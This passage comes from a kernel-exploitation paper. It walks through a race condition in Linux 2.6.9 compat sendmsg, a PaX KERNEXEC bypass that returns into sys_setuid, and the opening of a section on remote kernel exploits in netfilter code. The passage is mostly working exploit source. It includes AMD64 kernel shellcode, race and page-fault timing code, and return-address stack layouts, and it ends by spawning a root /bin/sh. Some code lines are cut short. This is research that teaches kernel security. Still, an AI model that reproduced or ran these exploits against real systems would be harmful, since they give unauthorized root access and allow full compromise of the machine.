Moreover, if original looks small enough, we end up copying to on-stack
< linux-2.6.9/net/compat.c >

int cmsghdr_from_user_compat_to_kern(struct msghdr *kmsg,
                               unsigned char *stackbuf, int stackbuf_size)
        struct compat_cmsghdr __user *ucmsg;
        struct cmsghdr *kcmsg, *kcmsg_base;
        compat_size_t ucmlen;
        __kernel_size_t kcmlen, tmp;

        kcmlen = 0;
        kcmsg_base = kcmsg = (struct cmsghdr *)stackbuf;            [1]


        while(ucmsg != NULL) {
                if(get_user(ucmlen, &ucmsg->cmsg_len))              [2]
                        return -EFAULT;

                /* Catch bogons. */
                if(CMSG_COMPAT_ALIGN(ucmlen) <
                   CMSG_COMPAT_ALIGN(sizeof(struct compat_cmsghdr)))
                        return -EINVAL;
                if((unsigned long)(((char __user *)ucmsg - (char __user
                                   + ucmlen) > kmsg->msg_controllen) [3]
                        return -EINVAL;

                tmp = ((ucmlen - CMSG_COMPAT_ALIGN(sizeof(*ucmsg))) +
                       CMSG_ALIGN(sizeof(struct cmsghdr)));
                kcmlen += tmp;                                       [4]
                ucmsg = cmsg_compat_nxthdr(kmsg, ucmsg, ucmlen);


        if(kcmlen > stackbuf_size)                                   [5] 
                kcmsg_base = kcmsg = kmalloc(kcmlen, GFP_KERNEL);


        while(ucmsg != NULL) {
                __get_user(ucmlen, &ucmsg->cmsg_len);                [6]
                tmp = ((ucmlen - CMSG_COMPAT_ALIGN(sizeof(*ucmsg))) +
                       CMSG_ALIGN(sizeof(struct cmsghdr)));
                kcmsg->cmsg_len = tmp;
                __get_user(kcmsg->cmsg_level, &ucmsg->cmsg_level);
                __get_user(kcmsg->cmsg_type, &ucmsg->cmsg_type);

                /* Copy over the data. */
                if(copy_from_user(CMSG_DATA(kcmsg),                  [7]
                                  (ucmlen -
                        goto out_free_efault;

< / >

As it is said in the advisory, the vulnerability is a double-reference to
some userland data (at [2] and at [6]) without sanitizing the value the
second time it is got from the userland (at [3] the check is performed,
instead). That 'data' is the 'size' of the user-part to copy-in
('ucmlen'), and it's used, at [7], inside the copy_from_user. 

This is a pretty common scenario for a race condition : if we create two
different threads, make the first one enter the codepath and , after [4],
we manage to put it to sleep and make the scheduler choice the other
thread, we can change the 'ucmlen' value and thus perform a 'buffer

The kind of overflow we're going to perform is 'decided' at [5] : if the
len is little, the buffer used will be in the stack, otherwise it will be
kmalloc'ed. Both the situation are exploitable, but we've chosen the stack
based one (we have already presented a slab exploit for the Linux
operating system before). We're going to use, inside the exploit, the
tecnique we've presented in the subsection before to force a process to
sleep, that is making it access data on a cross page boundary (with the
second page never referenced before nor already swapped in by the page
clustering mechanism) :

+------------+ --------> 0x20020000 [MMAP_ADDR + 32 * PAGE_SIZE] [*]
|            |
| cmsg_len   |           first cmsg_len starts at 0x2001fff4
| cmsg_level |           first struct compat_cmsghdr
| cmsg_type  |
|------------| -------->              0x20020000  [cross page boundary]
| cmsg_len   |           second cmsg_len starts at 0x20020000)
| cmsg_level |           second struct compat_cmsghdr
| cmsg_type  |
|            |
+------------+ --------> 0x20021000

[*] One of those so-called 'runtime adjustement'. The page clustering
    wasn't showing the expected behaviour in the first 32 mmaped-pages,
    while was just working as expected after.

As we said, we're going to perform a stack-based explotation writing past
the 'stackbuf' variable. Let's see where we get it from : 

< linux-2.6.9/net/socket.c > 

asmlinkage long sys_sendmsg(int fd, struct msghdr __user *msg, unsigned
        struct compat_msghdr __user *msg_compat =
        (struct compat_msghdr __user *)msg;
        struct socket *sock;
        char address[MAX_SOCK_ADDR];
        struct iovec iovstack[UIO_FASTIOV], *iov = iovstack;
        unsigned char ctl[sizeof(struct cmsghdr) + 20];
        unsigned char *ctl_buf = ctl;
        struct msghdr msg_sys;
        int err, ctl_len, iov_size, total_len;

        if ((MSG_CMSG_COMPAT & flags) && ctl_len) {
err = cmsghdr_from_user_compat_to_kern(&msg_sys, ctl, sizeof(ctl));


< / >

The situation is less nasty as it seems (at least on the systems we tested
the code on) : thanks to gcc reordering the stack variables we get our
'msg_sys' struct placed as if it was the first variable.
That simplifies a lot our exploiting task, since we don't have to take
care of 'emulating' in userspace the structure referenced between our
overflow and the 'return' of the function (for example the struct sock).
Exploiting in this 'second case' would be slightly more complex, but
doable aswell.

The shellcode for the exploit is not much different (as expected, since
the AMD64 is a 'superset' of the x86 architecture) from the ones provided
before for the Linux/x86 environment, netherless we've two focus on two
important different points : the 'thread/task struct dereference' and the
'userspace context switch approach'. 

For the first point, let's start analyzing the get_current()
implementation : 

< linux-2.6.9/include/asm-x86_64/current.h >

#include <asm/pda.h>

static inline struct task_struct *get_current(void)
        struct task_struct *t = read_pda(pcurrent);
        return t;

#define current get_current()


#define GET_CURRENT(reg) movq %gs:(pda_pcurrent),reg

< / > 

< linux-2.6.9/include/asm-x86_64/pda.h >

struct x8664_pda {
        struct task_struct *pcurrent;   /* Current process */
        unsigned long data_offset;      /* Per cpu data offset from linker
address */
        struct x8664_pda *me;       /* Pointer to itself */
        unsigned long kernelstack;  /* top of kernel stack for current */

#define pda_from_op(op,field) ({ \
       typedef typeof_field(struct x8664_pda, field) T__; T__ ret__; \
       switch (sizeof_field(struct x8664_pda, field)) {                 \
case 2: \
asm volatile(op "w %%gs:%P1,%0":"=r"
(ret__):"i"(pda_offset(field)):"memory"); break;\

#define read_pda(field) pda_from_op("mov",field)
< / > 

The task_struct is thus no more into the 'current stack' (more precisely,
referenced from the thread_struct which is actually saved into the
'current stack'), but is stored into the 'struct x8664_pda'. This struct
keeps many information relative to the 'current' process and the CPU it is
running over (kernel stack address, irq nesting counter, cpu it is running
over, number of NMI on that cpu, etc).
As you can see from the 'pda_from_op' macro, during the execution of a
Kernel Path, the address of the 'struct x8664_pda' is kept inside the %gs
register. Moreover, the 'pcurrent' member (which is the one we're actually
interested in) is the first one, so obtaining it from inside a shellcode
is just a matter of doing a : 

	movq %gs:0x0, %rax 

From that point on the 'scanning' to locate uid/gid/etc is just the same
used in the previously shown exploits. 

The second point which quite differs from the x86 case is the 'restore'
part (which is, also, a direct consequence of the %gs using). 
First of all we have to do a '64-bit based' restore, that is we've to push
the 64-bit registers RIP,CC,RFLAGS,RSP and SS and call, at the end, the
'iretq' instruction (the extended version of the 'iret' one on x86).
Just before returning we've to remember to perform the 'swapgs'
instruction, which swaps the %gs content with the one of the KernelGSbase
(MSR address C000_0102h).
If we don't perform the gs restoring, at the next syscall or interrupt the
kernel will use an invalid value for the gs register and will just crash. 

Here's the shellcode in asm inline notation :

void stub64bit()
asm volatile (
                "movl %0, %%esi\t\n"
                "movq %%gs:0, %%rax\n"
                "xor %%ecx, %%ecx\t\n"
                "1: cmp $0x12c, %%ecx\t\n"
                "je 4f\t\n"
                "movl (%%rax), %%edx\t\n"
                "cmpl %%esi, %%edx\t\n"
                "jne 3f\t\n"
                "movl 0x4(%%rax),%%edx\t\n"
                "cmp %%esi, %%edx\t\n"
                "jne 3f\t\n"
                "xor %%edx, %%edx\t\n"
                "movl %%edx, 0x4(%%rax)\t\n"
                "jmp 4f\t\n"
                "3: add $4,%%rax\t\n"
                "inc %%ecx\t\n"
                "jmp 1b\t\n"
                "movq $0x000000000000002b,0x20(%%rsp)\t\n"
                "movq %1,0x18(%%rsp)\t\n"
                "movq $0x0000000000000246,0x10(%%rsp)\t\n"
                "movq $0x0000000000000023,0x8(%%rsp)\t\n"
                "movq %2,0x0(%%rsp)\t\n"
                : : "i"(UID), "i"(STACK_OFFSET), "i"(CODE_OFFSET)

With UID being the 'uid' of the current running process and STACK_OFFSET
and CODE_OFFSET the address of the stack and code 'segment' we're
returning into in userspace. All those values are taken and patched at
runtime in the exploit 'make_kjump' function : 

< stuff/expl/linux/sracemsg.c > 

#define PAGE_SIZE 0x1000
#define MMAP_ADDR ((void*)0x20000000)
#define MMAP_NULL ((void*)0x00000000)
#define PAGE_NUM 128

#define PATCH_CODE(base,offset,value) \
       *((uint32_t *)((char*)base + offset)) = (uint32_t)(value)

#define fatal_errno(x,y) { perror(x); exit(y); }

struct cmsghdr *g_ancillary;

/* global shared value to sync threads for race */
volatile static int glob_race = 0;

#define UID_OFFSET 1
#define CODE_OFF_OFFSET  95


int make_kjump(void)
  void *stack_map = mmap((void*)(0x11110000), 0x2000,
  if(stack_map == MAP_FAILED)
    fatal_errno("mmap", 1);

  void *shellcode_map = mmap(MMAP_NULL, 0x1000,
  if(shellcode_map == MAP_FAILED)
    fatal_errno("mmap", 1);

  memcpy(shellcode_map, kernel_stub, sizeof(kernel_stub)-1);


< / > 

The rest of the exploit should be quite self-explanatory and we're going
to show the code here after in a short. Note the lowering of the priority
inside start_thread_priority ('nice(19)'), so that we have some more
chance to win the race (the 'glob_race' variable works just like a
spinning lock for the main thread - check 'race_func()').

As a last note, we use the 'rdtsc' (read time stamp counter) instruction
to calculate the time that intercurred while trying to win the race. If
this gap is high it is quite probable that a scheduling happened. 
The task of 'flushing all pages' (inside page cache), so that we'll be
sure that we'll end using demand paging on cross boundary access, is not
implemented inside the code (it could have been easily added) and is left
to the exploit runner. Since we have to create the file with controlled
data, those pages end up cached in the page cache. We have to force the
subsystem into discarding them. It shouldn't be hard for you, if you
followed the discussion so far, to perform tasks that would 'flush the
needed pages' (to disk) or add code to automatize it. (hint : mass find &
cat * > /dev/null is an idea).

Last but not least, since the vulnerable function is inside 'compat.c',
which is the 'compatibility mode' to run 32-bit based binaries, remember to
compile the exploit with the -m32 flag.

< stuff/expl/linux/sracemsg.c >
#include <stdio.h>
#include <signal.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <sched.h>
#include <sys/socket.h>

#define PAGE_SIZE 0x1000
#define MMAP_ADDR ((void*)0x20000000)
#define MMAP_NULL ((void*)0x00000000)
#define PAGE_NUM 128

#define PATCH_CODE(base,offset,value) \
       *((uint32_t *)((char*)base + offset)) = (uint32_t)(value)

#define fatal_errno(x,y) { perror(x); exit(y); }

struct cmsghdr *g_ancillary;

/* global shared value to sync threads for race */
volatile static int glob_race = 0;

#define UID_OFFSET 1
#define CODE_OFF_OFFSET  95

char kernel_stub[] =

"\xbe\xe8\x03\x00\x00"                   //  mov    $0x3e8,%esi
"\x65\x48\x8b\x04\x25\x00\x00\x00\x00"   //  mov    %gs:0x0,%rax
"\x31\xc9"                               //  xor    %ecx,%ecx  (15
"\x81\xf9\x2c\x01\x00\x00"               //  cmp    $0x12c,%ecx
"\x74\x1c"                               //  je     400af0
"\x8b\x10"                               //  mov    (%rax),%edx
"\x39\xf2"                               //  cmp    %esi,%edx
"\x75\x0e"                               //  jne    400ae8
"\x8b\x50\x04"                           //  mov    0x4(%rax),%edx
"\x39\xf2"                               //  cmp    %esi,%edx
"\x75\x07"                               //  jne    400ae8
"\x31\xd2"                               //  xor    %edx,%edx
"\x89\x50\x04"                           //  mov    %edx,0x4(%rax)
"\xeb\x08"                               //  jmp    400af0
"\x48\x83\xc0\x04"                       //  add    $0x4,%rax
"\xff\xc1"                               //  inc    %ecx
"\xeb\xdc"                               //  jmp    400acc
"\x0f\x01\xf8"                           //  swapgs (54
"\x48\xc7\x44\x24\x20\x2b\x00\x00\x00"   //  movq   $0x2b,0x20(%rsp)
"\x48\xc7\x44\x24\x18\x11\x11\x11\x11"   //  movq   $0x11111111,0x18(%rsp)
"\x48\xc7\x44\x24\x10\x46\x02\x00\x00"   //  movq   $0x246,0x10(%rsp)
"\x48\xc7\x44\x24\x08\x23\x00\x00\x00"   //  movq   $0x23,0x8(%rsp)  /* 23
32-bit , 33 64-bit cs */
"\x48\xc7\x04\x24\x22\x22\x22\x22"       //  movq   $0x22222222,(%rsp)
"\x48\xcf";                              //  iretq

void eip_do_exit(void)
  char *argvx[] = {"/bin/sh", NULL};
  printf("uid=%d\n", geteuid());
  execve("/bin/sh", argvx, NULL);

 * This function maps stack and code segment
 * - 0x0000000000000000 - 0x0000000000001000   (future code space)
 * - 0x0000000011110000 - 0x0000000011112000   (future stack space)

int make_kjump(void)
  void *stack_map = mmap((void*)(0x11110000), 0x2000,
  if(stack_map == MAP_FAILED)
    fatal_errno("mmap", 1);

  void *shellcode_map = mmap(MMAP_NULL, 0x1000,
  if(shellcode_map == MAP_FAILED)
    fatal_errno("mmap", 1);

  memcpy(shellcode_map, kernel_stub, sizeof(kernel_stub)-1);


int start_thread_priority(int (*f)(void *), void* arg)
  char *stack = malloc(PAGE_SIZE*4);
  int tid = clone(f, stack + PAGE_SIZE*4 -4,
  if(tid < 0)
  fatal_errno("clone", 1);

  return tid;

int race_func(void* noarg)
  printf("[*] thread racer getpid()=%d\n", getpid());
      g_ancillary->cmsg_len = 500;

uint64_t tsc()
  uint64_t ret;
  asm volatile("rdtsc" : "=A"(ret));

  return ret;

struct tsc_stamp
  uint64_t before;
  uint64_t after;
  uint32_t access;

struct tsc_stamp stamp[128];

inline char *flat_file_mmap(int fs)
  if(addr == MAP_FAILED)
    fatal_errno("mmap", 1);
  return (char*)addr;

void scan_addr(char *memory)
  int i;
  for(i=1; i<PAGE_NUM-1; i++)
    stamp[i].access = (uint32_t)(memory + i*PAGE_SIZE);
    uint32_t dummy = *((uint32_t *)(memory + i*PAGE_SIZE-4));
    stamp[i].before = tsc();
    dummy = *((uint32_t *)(memory + i*PAGE_SIZE));
    stamp[i].after  = tsc();


/* make code access first 32 pages to flush page-cluster */
/* access: 0x20000000 - 0x2000XXXX */

void start_flush_access(char *memory, uint32_t page_num)
  int i;
  for(i=0; i<page_num; i++)
    uint32_t dummy = *((uint32_t *)(memory + i*PAGE_SIZE));

void print_single_result(struct tsc_stamp *entry)
  printf("Accessing: %p, tsc-difference: %lld\n", entry->access,
entry->after - entry->before);

void print_result()
  int i;
  for(i=1; i<PAGE_NUM-1; i++)
    printf("Accessing: %p, tsc-difference: %lld\n", stamp[i].access,
stamp[i].after - stamp[i].before);

void fill_ancillary(struct msghdr *msg, char *ancillary)
  msg->msg_control = ((ancillary + 32*PAGE_SIZE) - sizeof(struct
  msg->msg_controllen = sizeof(struct cmsghdr) * 2;

  /* set global var thread race ancillary data chunk */
  g_ancillary = msg->msg_control;

  struct cmsghdr* tmp = (struct cmsghdr *)(msg->msg_control);
  tmp->cmsg_len   = sizeof(struct cmsghdr);
  tmp->cmsg_level = 0;
  tmp->cmsg_type  = 0;

  tmp->cmsg_len   = sizeof(struct cmsghdr);
  tmp->cmsg_level = 0;
  tmp->cmsg_type  = 0;

  memset(tmp, 0x00, 172);

int main()
  struct tsc_stamp single_stamp = {0};
  struct msghdr msg = {0};

  memset(&stamp, 0x00, sizeof(stamp));
  int fd = open("/tmp/file", O_RDWR);
  if(fd == -1)
    fatal_errno("open", 1);

  char *addr = flat_file_mmap(fd);

  fill_ancillary(&msg, addr);

  munmap(addr, PAGE_SIZE*PAGE_NUM);

  printf("Flush all pages and press a enter:)\n");

  fd = open("/tmp/file", O_RDWR);
  if(fd == -1)
    fatal_errno("open", 1);
  addr = flat_file_mmap(fd);

  int t_pid = start_thread_priority(race_func, NULL);
  printf("[*] thread main getpid()=%d\n", getpid());

  start_flush_access(addr, 32);

  int sc[2];
  int sp_ret = socketpair(AF_UNIX, SOCK_STREAM, 0, sc);
  if(sp_ret < 0)
    fatal_errno("socketpair", 1);

  single_stamp.access = (uint32_t)g_ancillary;
  single_stamp.before = tsc();

  glob_race =1;
  sendmsg(sc[0], &msg, 0);

  single_stamp.after = tsc();


  kill(t_pid, SIGKILL);
  munmap(addr, PAGE_SIZE*PAGE_NUM);
  return 0;

< / > 

------[ 3 - Advanced scenarios 

In an attempt to ''complete'' our tractation on kernel exploiting we're
now going to discuss two 'advanced scenarios' : a stack based kernel
exploit capable to bypass PaX [18] KERNEXEC and Userland / Kernelland
split and an effective remote exploit, both for the Linux kernel. 

---[ 3.1 - PaX KERNEXEC & separated kernel/user space

The PaX KERNEXEC option emulates a no-exec bit for pages at kernel land
on an architecture which hasn't it (x86), while the User / Kerne Land
split blocks the 'return-to-userland' approach that we have extensively
described and used in the paper. With those two protections active we're
basically facing the same scenario we encountered discussing the 
Solaris/SPARC environment, so we won't go in more details here (to avoid
duplicating the tractation). 

This time, thou, we won't have any executable and controllable memory area
(no u_psargs array), and we're going to present a different tecnique which
doesn't require to have one. Even if the idea behind applyes well to any
no-exec and separated kernel/userspace environment, as we'll see in a
short, this approach is quite architectural (stack management and function
call/return implementation) and Operating System (handling of credentials)

Moreover, it requires a precise knowledge of the .text layout of the
running kernel, so at least a readable image (which is a default situation
on many distros, on Solaris, and on other operating systems we checked) or
a large or controlled infoleak is necessary. 

The idea behind is not much different from the theory behind
'ret-into-libc' or other userland exploiting approaches that attempt to
circumvent the non executability of heap and stack : as we know, Linux
associates credentials to each process in term of numeric values :

< linux-2.6.15/include/linux/sched.h >

struct task_struct {
/* process credentials */
        uid_t uid,euid,suid,fsuid;
        gid_t gid,egid,sgid,fsgid;

< / > 

Sometimes a process needs to raise (or drop, for security reasons) its
credentials, so the kernel exports systemcalls to do that. 
One of those is sys_setuid :

< linux-2.6.15/kernel/sys.c >

asmlinkage long sys_setuid(uid_t uid)
        int old_euid = current->euid;
        int old_ruid, old_suid, new_ruid, new_suid;
        int retval;

        retval = security_task_setuid(uid, (uid_t)-1, (uid_t)-1,
        if (retval)
                return retval;

        old_ruid = new_ruid = current->uid;
        old_suid = current->suid;
        new_suid = old_suid;

        if (capable(CAP_SETUID)) {              [1]
                if (uid != old_ruid && set_user(uid, old_euid != uid) < 0)
                        return -EAGAIN;
                new_suid = uid;
        } else if ((uid != current->uid) && (uid != new_suid))
                return -EPERM;

        if (old_euid != uid)
                current->mm->dumpable = suid_dumpable;
        current->fsuid = current->euid = uid;    [2] 
        current->suid = new_suid;

        proc_id_connector(current, PROC_EVENT_UID);

        return security_task_post_setuid(old_ruid, old_euid, old_suid,

< / > 

As you can see, the 'security' checks (out of the LSM security_* entry
points) are performed at [1] and after those, at [2] the values of fsuid
and euid are set equal to the value passed to the function. 
sys_setuid is a system call, so, due to systemcall convention, parameters
are passed in register. More precisely, 'uid' will be passed in '%ebx'. 
The idea is so simple (and not different from 'ret-into-libc' [19] or 
other userspace page protection evading tecniques like [20]), if we manage
to have 0 into %ebx and to jump right in the middle of sys_setuid (and
right after the checks) we should be able to change the 'euid' and 'fsuid'
of our process and thus raise our priviledges. 

Let's see the sys_setuid disassembly to better tune our idea :

c0120fd0:       b8 00 e0 ff ff          mov    $0xffffe000,%eax  [1]
c0120fd5:       21 e0                   and    %esp,%eax
c0120fd7:       8b 10                   mov    (%eax),%edx
c0120fd9:       89 9a 6c 01 00 00       mov    %ebx,0x16c(%edx)  [2]
c0120fdf:       89 9a 74 01 00 00       mov    %ebx,0x174(%edx)
c0120fe5:       8b 00                   mov    (%eax),%eax
c0120fe7:       89 b0 70 01 00 00       mov    %esi,0x170(%eax)
c0120fed:       6a 01                   push   $0x1
c0120fef:       8b 44 24 04             mov    0x4(%esp),%eax
c0120ff3:       50                      push   %eax
c0120ff4:       55                      push   %ebp
c0120ff5:       57                      push   %edi
c0120ff6:       e8 65 ce 0c 00          call   c01ede60
c0120ffb:       89 c2                   mov    %eax,%edx
c0120ffd:       83 c4 10                add    $0x10,%esp        [3]  
c0121000:       89 d0                   mov    %edx,%eax
c0121002:       5e                      pop    %esi
c0121003:       5b                      pop    %ebx
c0121004:       5e                      pop    %esi
c0121005:       5f                      pop    %edi
c0121006:       5d                      pop    %ebp
c0121007:       c3                      ret

At [1] the current process task_struct is taken from the kernel stack
value. At [2] the %ebx value is copied over the 'euid' and 'fsuid' members
of the struct. We have our return address, which is [1]. 
At that point we need to force somehow %ebx into being 0 (if we're not
lucky enough to have it already zero'ed).

To demonstrate this vulnerability we have used the local exploitable
buffer overflow in dummy.c driver (KERN_IOCTL_STORE_CHUNK ioctl()
command). Since it's a stack based overflow we can chain multiple return
address preparing a fake stack frame that we totally control. 
We need : 

 - a zero'ed %ebx : the easiest way to achieve that is to find a pop %ebx
   followed by a ret instruction [we control the stack] : 

		[*] c0100cd3:       5b      pop    %ebx
		[*] c0100cd4:       c3      ret
   we don't strictly need pop %ebx directly followed by ret, we may find a
   sequence of pops before the ret (and, among those, our pop %ebx). It is
   just a matter of preparing the right ZERO-layout for the pop sequence
   (to make it simple, add a ZERO 4-bytes sequence for any pop between the
   %ebx one and the ret)    

 - the return addr where to jump, which is the [1] address shown above

 - a 'ret-to-ret' padding to take care of the stack gap created at [3] by
   the function epilogue (%esp adding and register popping) :
	ret-to-ret pad:
		[*] 0xffffe413      c3      ret 

   (we could have used the above ret aswell, this one is into vsyscall
    page and was used in other exploit where we didn't need so much
    knowledge of the kernel .text.. it survived here :) )

 - the address of an iret instruction to return to userland (and a crafted
   stack frame for it, as we described above while discussing 'Stack
   Based' explotation) :

		[*] c013403f:       cf      iret

Putting all together this is how our 'stack' should look like to perform a
correct explotation :

low addresses
            | ret-to-ret pad |
            | ret-to-ret pad |
            | .............. |
            | ret-to-pop ebx |
            | 0x00000000     |
            | ret-to-setuid  |
            | ret-to-ret pad |
            | ret-to-ret pad |
            | ret-to-ret pad |
            | .............  |
            | .............  |
            | ret-to-iret    |
            | fake-iret-frame|
high addresses

Once correctly returned to userspace we have successfully modified 'fsuid'
and 'euid' value, but our 'ruid' is still the original one. At that point
we simply re-exec ourselves to get euid=0 and then spawn the shell. 
Code follows :

< stuff/expl/grsec_noexec.c >

#include <sys/ioctl.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>

#include "dummy.h"

#define DEVICE "/dev/dummy"
#define NOP 0x90
#define PAGE_SIZE 0x1000
#define STACK_SIZE 8192
//#define STACK_SIZE 4096

/* patch it at runtime */


#define RET_INTO_RET_STR   "\x3d\x28\x02\x00"
#define DUMMY              RET_INTO_RET_STR
#define ZERO               "\x00\x00\x00\x00"

/* 22ad3 */
#define RET_INTO_POP_EBX   "\xd3\x2a\x02\x00"
/* 1360 */
#define RET_INTO_IRET      "\x60\x13\x00\x00"
/* 227fc */
#define RET_INTO_SETUID    "\xfc\x27\x02\x00"

// do_eip at .text offset (rivedere)
// 0804864f
#define USER_CODE_OFFSET   "\x4f\x86\x04\x08"
#define USER_CODE_SEGMENT  "\x73\x00\x00\x00"
#define USER_EFLAGS        "\x46\x02\x00\x00"
#define USER_STACK_OFFSET  "\xbb\xbb\xbb\x00"
#define USER_STACK_SEGMENT "\x7b\x00\x00\x00"

/* sys_setuid - grsec kernel */
   227fc:       89 e2                   mov    %esp,%edx
   227fe:       89 f1                   mov    %esi,%ecx
   22800:       81 e2 00 e0 ff ff       and    $0xffffe000,%edx
   22806:       8b 02                   mov    (%edx),%eax
   22808:       89 98 50 01 00 00       mov    %ebx,0x150(%eax)
   2280e:       89 98 58 01 00 00       mov    %ebx,0x158(%eax)
   22814:       8b 02                   mov    (%edx),%eax
   22816:       89 fa                   mov    %edi,%edx
   22818:       89 a8 54 01 00 00       mov    %ebp,0x154(%eax)
   2281e:       c7 44 24 18 01 00 00    movl   $0x1,0x18(%esp)
   22825:       00
   22826:       8b 04 24                mov    (%esp),%eax
   22829:       5d                      pop    %ebp
   2282a:       5b                      pop    %ebx
   2282b:       5e                      pop    %esi
   2282c:       5f                      pop    %edi
   2282d:       5d                      pop    %ebp
   2282e:       e9 ef d5 0c 00          jmp    efe22
   22833:       83 ca ff                or     $0xffffffff,%edx
   22836:       89 d0                   mov    %edx,%eax
   22838:       5f                      pop    %edi
   22839:       5b                      pop    %ebx
   2283a:       5e                      pop    %esi
   2283b:       5f                      pop    %edi
   2283c:       5d                      pop    %ebp
   2283d:       c3                      ret


/* pop %ebx, ret grsec
 * ffd1a884:       5b                      pop    %ebx
 * ffd1a885:       c3                      ret

char *g_prog_name;

char kern_noexec_shellcode[] =

void re_exec(int useless)
  char *a[3] = { g_prog_name, "exec", NULL };
  execve(g_prog_name, a, NULL);

char *allocate_jump_stack(unsigned int jump_addr, unsigned int size)
  unsigned int round_addr = jump_addr & 0xFFFFF000;
  unsigned int diff       = jump_addr - round_addr;
  unsigned int len        = (size + diff + 0xFFF) & 0xFFFFF000;
  char *map_addr = mmap((void*)round_addr,

  if(map_addr == (char*)-1)
    return NULL;

  memset(map_addr, 0x00, len);

  return map_addr;

char *allocate_jump_code(unsigned int jump_addr, void* code, unsigned int
  unsigned int round_addr = jump_addr & 0xFFFFF000;
  unsigned int diff       = jump_addr - round_addr;
  unsigned int len        = (size + diff + 0xFFF) & 0xFFFFF000;

  char *map_addr = mmap((void*)round_addr,

  if(map_addr == (char*)-1)
    return NULL;

  memset(map_addr, NOP, len);
  memcpy(map_addr+diff, code, size);

  return map_addr + diff;

inline void patch_code_4byte(char *code, unsigned int offset, unsigned int
  *((unsigned int *)(code + offset)) = value;

int main(int argc, char *argv[])
  if(argc > 1)
    int ret;
    char *argvx[] = {"/bin/sh", NULL};
    ret = setuid(0);
    printf("euid=%d, ret=%d\n", geteuid(), ret);
    execve("/bin/sh", argvx, NULL);

  signal(SIGSEGV, re_exec);

  g_prog_name = argv[0];
  char *stack_jump =
          allocate_jump_stack(ALTERNATE_STACK, PAGE_SIZE);

    fprintf(stderr, "Exiting: mmap failed");

  char *memory = malloc(PAGE_SIZE), *mem_orig;
  mem_orig = memory;

  memset(memory, 0xDD, PAGE_SIZE);

  struct device_io_ctl *ptr = (struct device_io_ctl*)memory;
  ptr->chunk_num = 9 + (sizeof(kern_noexec_shellcode)-1)/sizeof(struct
device_io_blk) + 1;
  printf("Chunk num: %d\n", ptr->chunk_num);
  ptr->type = 0xFFFFFFFF;

  memory += (sizeof(struct device_io_ctl) + sizeof(struct device_io_blk) *

  /* copy shellcode */
  memcpy(memory, kern_noexec_shellcode, sizeof(kern_noexec_shellcode)-1);

  int i, fd = open(DEVICE,  O_RDONLY);
  if(fd < 0)
    return 0;

  ioctl(fd, KERN_IOCTL_STORE_CHUNK, (unsigned long)mem_orig);
  return 0;

< / >

As we said, we have chosen the PaX security patches for Linux/x86, but
some of the theory presented equally works well in other situation. 
A slightly different exploiting approach was successfully used on
Solaris/SPARC. (we leave it as an 'exercise' for the reader ;)) 

---[ 3.2 - Remote Kernel Exploiting 

Writing a working and somehow reliable remote kernel exploit is an
exciting and interesting challenge. Keeping on with the 'style' of this
paper we're going to propose here a couple of tecniques and 'life notes'
that leaded us into succeeding into writing an almost reliable, image
independant and effective remote exploit.

After the first draft of this paper, a couple of things changed, so some
of the information presented here could be outdated in the very latest
kernels (and compiler releases), but are anyway a good base for the
tractation (we've added notes all around this chapter about changes and
updates into the recent releases of the linux kernel).

A couple of the ideas presented here converged into a real remote exploit
for the madwifi remote kernel stack buffer overflow [21], that we already
released [22], without examining too much in detail the explotation
approaches used. This chapter can be thus seen both as the introduction
and the extension of that work. 
More precisely we will cover here also the exploiting issues and solution
when dealing with code running in interrupt context, which is the most
common running mode for network based code (interrupt handler, softirq,
etc) but which wasn't the case for the madwifi exploit.
The same ideas apply well to kernel thread context too.

Explotation tecniques and discussion is based on stack based buffer
overflow on the Linux 2.6.* branch of kernels on the x86 architecture, but
can be reused in most of the conditions that lead us to take control over 
the instruction flow.

------[ 3.2.1 - The Network Contest 

We begin with a few considerations about the typology of kernel code that 
we'll be dealing with. Most of that code runs in interrupt context (and
sometimes in a kernel thread context), so we have some 'limitations' :

  - we can't directly 'return-to-userspace', since we don't have a valid 
    current task pointer. Moreover, most of times, we won't control the
    address space of the userland process we talk with. Netherless we can
    relay on some 'fixed' points, like the ELF header (given there's no
    PIE / .text randomization on the remote box)

  - we can't perform any action that might make the kernel path to sleep
    (for example a memory fault access)

  - we can't directly call a system call 
  - we have to take in account kernel resource management, since such kind
    of kernel paths usually acquire spinlocks or disables pre-emption. We
    have to restore them in a stable state.

Logically, since we are from remote, we don't have any information about
structs or kernel paths addresses, so, since a good infoleaking is usually
a not very probable situation, we can't rely on them. 

We have prepared a crafted example that will let us introduce all the
tecniques involved to solve the just stated problems. We choosed to write
a netfilter module, since quite a lot of the network kernel code depends
on it and it's the main framework for third part modules. 

< stuff/drivers/linux/remote/dummy_remote.c >

#define MAX_TWSKCHUNK 30
#define TWSK_PROTO    37

struct twsk_chunk
  int type;
  char buff[12];

struct twsk
  int chunk_num;
  struct twsk_chunk chunk[0];

static int process_twsk_chunk(struct sk_buff *buff)
  struct twsk_chunk chunks[MAX_TWSKCHUNK];

  struct twsk *ts = (struct twsk *)((char*)buff->nh.iph +
(buff->nh.iph->ihl * 4));

  if(ts->chunk_num > MAX_TWSKCHUNK)                                   [1]                               
    return (NF_DROP);

  printk(KERN_INFO "Processing TWSK packet: packet frame n. %d\n",

memcpy(chunks, ts->chunk, sizeof(struct twsk_chunk) * ts->chunk_num); [2] 

  // do somethings..

  return (NF_ACCEPT);


< / >

We have a signedness issue at [1], which triggers a later buffer overflow
at [2], writing past the local 'chunks' buffer. 
As we just said, we must know everything about the vulnerable function,
that is, when it runs, under which 'context' it runs, what calls what, how
would the stack look like, if there are spinlocks or other control 
management objects acquired, etc.

A good starting point is dumping a stack trace at calling time of our
function :

#1  0xc02b5139 in nf_iterate (head=0xc042e4a0, skb=0xc1721ad0, hook=0, [1]
    indev=0xc1224400, outdev=0x0, i=0xc1721a88,
    okfn=0xc02bb150 <ip_rcv_finish>, hook_thresh=-2147483648)
    at net/netfilter/core.c:89
#2  0xc02b51b9 in nf_hook_slow (pf=2, hook=1, pskb=0xc1721ad0,         [2] 
    indev=0xc1224400, outdev=0x0, okfn=0xc02bb150 <ip_rcv_finish>,
    hook_thresh=-2147483648) at net/netfilter/core.c:125
#3  0xc02baee3 in ip_rcv (skb=0xc1bc4a40, dev=0xc1224400, pt=0xc0399310,
